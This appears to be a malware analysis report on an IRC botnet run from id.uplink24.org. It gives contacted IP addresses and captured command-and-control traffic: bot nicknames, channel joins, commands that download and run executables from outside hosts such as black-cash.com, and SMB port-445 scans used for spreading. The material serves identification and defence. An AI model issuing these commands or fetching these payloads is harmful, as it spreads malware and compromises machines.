id.uplink24.org (botnet hosted in the Russian Federation, Donekoservice Ltd)

Remote Host       Port Number
192.168.62.2      445
69.10.52.149      80
74.206.242.164    80
91.201.66.5       1234

NICK [N00_USA_XP_8141634]x
MODE [N00_USA_XP_8141634]x
A -ix
JOIN #a1
PRIVMSG [N00_USA_XP_8141
@ :download; File download: 76.5KB to: C:up2.exe @ 76.5KB/sec.
PRIVMSG #spam :HTTP SET http://black-cash.com/a11.exe
@ :download; Created process: “C:up2.exe”, PID:
@ :scan; Sequential Port Scan started on 192.168.62.0:445 with a delay of 3 seconds for 0 minutes using 10 threads.
USER SP2-844 * 0 :COMPUTERNAME
@ :scan; Sequential Port Scan started on 192.168.0.0:445 with a delay of 3 seconds for 0 minutes using 25 threads.
@ :scan; Random Port Scan started on 174.133.x.x:445 with a delay of 3 seconds for 0 minutes using 50 threads.

The data identified by the following URLs was then requested from the remote web server:
http://digitaltoolsworld.in/install.48208.exe
http://www.pr0.net/deny2/azenv.php

UPDATE:
NICK [N00_USA_XP_2161241]x
JOIN #a4
MODE [N00_USA_XP_2161241]x
A -ix
PRIVMSG #spam :HTTP SET http://black-cash.com/file.exe
PRIVMSG [N00_USA_XP_2161
@ :scan; Sequential Port Scan started on 192.168.248.0:445 with a delay of 3 seconds for 0 minutes using 10 threads.
USER SP2-351 * 0 :COMPUTERNAME
@ :scan; Sequential Port Scan started on 192.168.0.0:445 with a delay of 3 seconds for 0 minutes using 25 threads.
@ :scan; Random Port Scan started on 174.133.x.x:445 with a delay of 3 seconds for 0 minutes using 50 threads.

Info about the hosting:
http://whois.domaintools.com/91.201.66.5
